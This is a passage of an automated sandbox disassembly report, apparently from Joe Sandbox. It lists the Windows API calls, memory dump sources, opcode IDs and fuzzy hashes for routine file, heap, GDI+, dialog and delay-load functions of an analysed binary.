                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: c838cb1de2b76389113de94f5d48d63e25a4243fddf6a2eea6c5e8483e5a9096
                                                              • Instruction ID: 231efa7b41779dc6cd7f75f0243659101d37342ce17afc9d2b803c03ee141e6c
                                                              • Opcode Fuzzy Hash: c838cb1de2b76389113de94f5d48d63e25a4243fddf6a2eea6c5e8483e5a9096
                                                              • Instruction Fuzzy Hash: 30F0A03220435A9FCF118FA9EE2089B77A9BF467657111525FE14F61A0DF30D928CB90
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 90da5cf80e174da834a3b5e89537e995e3712fa66f8e3b175c13a1073bd1b911
                                                              • Instruction ID: 20374e37d6396a103b3ad84d8ce0eccd58551e2ec43b8afab37768f8dff31a50
                                                              • Opcode Fuzzy Hash: 90da5cf80e174da834a3b5e89537e995e3712fa66f8e3b175c13a1073bd1b911
                                                              • Instruction Fuzzy Hash: F8E06D3110D234AAEE212A769D01BAA36999F427F4F1A6120BC04B62A1DAE4DC2182E0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID:
                                                              • API String ID: 176396367-0
                                                              • Opcode ID: 6461d7e699e14e90cc700b1d000fabc94daae1be8b5a206dfd0e6fb8e739b47e
                                                              • Instruction ID: 2a3259111b87c22203d89ac612f104d5feec25c8fc8141f6cd97f79eec2168b7
                                                              • Opcode Fuzzy Hash: 6461d7e699e14e90cc700b1d000fabc94daae1be8b5a206dfd0e6fb8e739b47e
                                                              • Instruction Fuzzy Hash: 3EE0D8726102507CD66172296C01FE79BEC8FAAB74F14502FF1ADF61C1DAD0548583B2
                                                              APIs
                                                                • Part of subcall function 00E82AF9: FindFirstFileW.KERNEL32(?,?), ref: 00E82B22
                                                                • Part of subcall function 00E82AF9: FindFirstFileW.KERNEL32(?,?,?,?,00000800), ref: 00E82B50
                                                                • Part of subcall function 00E82AF9: GetLastError.KERNEL32(?,?,00000800), ref: 00E82B5C
                                                              • FindClose.KERNEL32(00000000), ref: 00E829F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              • Opcode ID: 165053e6e2d16e152c56e8684735ecedaf9c6a18cd3a2f7239dba87ccd1f44ec
                                                              • Instruction ID: 08a2a54d3ed6e0fbf124b4b560e20b7ed99bcdd9e3fd615ee1cee984214ff533
                                                              • Opcode Fuzzy Hash: 165053e6e2d16e152c56e8684735ecedaf9c6a18cd3a2f7239dba87ccd1f44ec
                                                              • Instruction Fuzzy Hash: 05F05E75008790AECA2677B44804BCBBBD0AF1A321F10AA8EF2FD32192C27550999722
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E8E0AB
                                                                • Part of subcall function 00E81E20: CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000), ref: 00E81E9F
                                                                • Part of subcall function 00E81E20: GetLastError.KERNEL32 ref: 00E81EAC
                                                                • Part of subcall function 00E81E20: CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800), ref: 00E81EE2
                                                                • Part of subcall function 00E81E20: GetLastError.KERNEL32 ref: 00E81EEA
                                                                • Part of subcall function 00E81E20: SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000), ref: 00E81F39
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$H_prologTime
                                                              • String ID:
                                                              • API String ID: 3517926197-0
                                                              • Opcode ID: 8b16c4c8691d105ac0a3ddd94d3ffcc8b1b6152b8d2ed1b8e63f7220b5eb01e3
                                                              • Instruction ID: ad35e01e34502d3a6f087d0b786e7bed1dc4d915031a0113bbba7ab2d76d7873
                                                              • Opcode Fuzzy Hash: 8b16c4c8691d105ac0a3ddd94d3ffcc8b1b6152b8d2ed1b8e63f7220b5eb01e3
                                                              • Instruction Fuzzy Hash: 0CF0F871900189ABCF14FB60C992BDDB3A9AB10304F0054D5B69AB6191DBB89B85CB10
                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00E8F84C
                                                                • Part of subcall function 00E8F5D9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E8F5FA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 3f5da4e93c1756c5f20b091966d0805785d91aec211097b7481f8b6ebaa856d2
                                                              • Instruction ID: c279cfd1ac0a98589cd6fc1877ef1cbb06d135857821de88226e6b8bf25d43a1
                                                              • Opcode Fuzzy Hash: 3f5da4e93c1756c5f20b091966d0805785d91aec211097b7481f8b6ebaa856d2
                                                              • Instruction Fuzzy Hash: E2D0A930300208BADF463B32AC029AE7AD8AB00340F00A231F85EA5180EEB0CE10A3A0
                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00E878B7), ref: 00E92D6E
                                                                • Part of subcall function 00E905A8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E905B9
                                                                • Part of subcall function 00E905A8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E905CA
                                                                • Part of subcall function 00E905A8: IsDialogMessageW.USER32(00020482,?), ref: 00E905DE
                                                                • Part of subcall function 00E905A8: TranslateMessage.USER32(?), ref: 00E905EC
                                                                • Part of subcall function 00E905A8: DispatchMessageW.USER32(?), ref: 00E905F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: a631ab256000d205f6322e34ecc3af0320ac926a53b3dff58e9c211e368119ed
                                                              • Instruction ID: 7335bfd9b707fc675888a4cea636af02ad04606b4c67dde42222667b71a10500
                                                              • Opcode Fuzzy Hash: a631ab256000d205f6322e34ecc3af0320ac926a53b3dff58e9c211e368119ed
                                                              • Instruction Fuzzy Hash: 83D09E32144200BEDB122B52DE07F1A7AE2BB88B04F804554B388380F1C6A29D319B05
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: d91e8cf50d68e3c3bc1e3f6785d5762b8dd3a78c84f47cf6f64c6752051a4ec0
                                                              • Instruction ID: 763eb1a575c6af60a99c753dc53e93d0fcf7c20cf33ffe98c9f97447909f79c1
                                                              • Opcode Fuzzy Hash: d91e8cf50d68e3c3bc1e3f6785d5762b8dd3a78c84f47cf6f64c6752051a4ec0
                                                              • Instruction Fuzzy Hash: D0D0C971410611CFE3619F39E444741BBE0AF08314B11882ED0C9D2120E6715880CF40
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 00007d6b07965a8d159266a2041df5f8aea55bc49bf7a47ecc65a2d396bb0cc7
                                                              • Instruction ID: e97270833ffff901e02fd5ed19d65a10dabbc6a5261575cd75ddfd7321b76050
                                                              • Opcode Fuzzy Hash: 00007d6b07965a8d159266a2041df5f8aea55bc49bf7a47ecc65a2d396bb0cc7
                                                              • Instruction Fuzzy Hash: 51B012C22D92497D350491A69D03D7701FCC0C0B113B0742BB800F0282D8503E044031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 7c4d896c42b48bc6e8784b74f596451278122721f37895d3c8add73830fdd005
                                                              • Instruction ID: 0e068a34abe39e9b06fee0f1ac7c824259fee82fd057c8f026bf937f8fdf941f
                                                              • Opcode Fuzzy Hash: 7c4d896c42b48bc6e8784b74f596451278122721f37895d3c8add73830fdd005
                                                              • Instruction Fuzzy Hash: 3BB012C52D92457D3604D1E69D03CF701ECC0C0B113B0752BBC00F0282D8503D480031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 658feef5239d5dbe25c82a62424f39c145cbf05ffdc0adfde59c296afd32e102
                                                              • Instruction ID: 63031d14f12f1e17f228c182b0a968374a6be68794979fd574fabc66b8f9ca1c
                                                              • Opcode Fuzzy Hash: 658feef5239d5dbe25c82a62424f39c145cbf05ffdc0adfde59c296afd32e102
                                                              • Instruction Fuzzy Hash: BAB012D52D8145BD394651A59C03CB701ECC0C4B103B0B11BB841F0181D5406E040031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 48b78cdc0966fcf14d0bbcadfff88d98906b147de55d1611dc6fba4805a75476
                                                              • Instruction ID: 050167279855a0e4ef82270eafb4a62f853a4b54949b3d66805cbecaa524f32a
                                                              • Opcode Fuzzy Hash: 48b78cdc0966fcf14d0bbcadfff88d98906b147de55d1611dc6fba4805a75476
                                                              • Instruction Fuzzy Hash: 7DB012C52D85457D760651A59C03D7B01FCC0C4B103B0B51BB545F0181D4406E080031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: e6d360195eac5a8653c2e2bd3f53e5ed76b72b3ecf33eb1a308dbb8a072ade01
                                                              • Instruction ID: 548d2101e42f77c8635db30c00813c26fbf6661a6c1a566875bb2b4c3700fa2f
                                                              • Opcode Fuzzy Hash: e6d360195eac5a8653c2e2bd3f53e5ed76b72b3ecf33eb1a308dbb8a072ade01
                                                              • Instruction Fuzzy Hash: 98B012C52D86857D370691A5AC03CF701ECC0C4B103B0B21BBD41F0181D4406D4C0031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 79aa081d71e078643513d01fab82d3769d486cedc4d86c452349895aaf2e4d45
                                                              • Instruction ID: b62dce4bd51316870e96b1b5b3bc954e4055294a40e759c95871be2bdbd18da5
                                                              • Opcode Fuzzy Hash: 79aa081d71e078643513d01fab82d3769d486cedc4d86c452349895aaf2e4d45
                                                              • Instruction Fuzzy Hash: 04B012C52D85457D370651A59D03CB711ECC0C4B203B0F11BB641F0281D4406D0D0031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93484
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 0e545e5502589f90324b74ae5527b15c64c4f5d2ea70ca2c217db20f924cad15
                                                              • Instruction ID: 9022e6e2fb336e2a3fc989c348f28b4163e1f14b8425daa63c6f3e3a26c5efaa
                                                              • Opcode Fuzzy Hash: 0e545e5502589f90324b74ae5527b15c64c4f5d2ea70ca2c217db20f924cad15
                                                              • Instruction Fuzzy Hash: EFB012C52D83457D360621B1BD43C7711ACC0C0B203B0F11BB641F018395406D051031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E933D6
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID:
                                                              • API String ID: 697777088-0
                                                              • Opcode ID: 6e82f36d96885e1fead4f56c680d82265511d2f48397c854ba80f8b0cc998af2
                                                              • Instruction ID: 21aa6926d9070651660758cd6cd6c8e9f996401ebfb58214ebeed2b3449e7cb7
                                                              • Opcode Fuzzy Hash: 6e82f36d96885e1fead4f56c680d82265511d2f48397c854ba80f8b0cc998af2
                                                              • Instruction Fuzzy Hash: 2CB012C12EB1457D3504D1A69D03D7702FCC4C0B113B0742BB800F0181D8503E044031
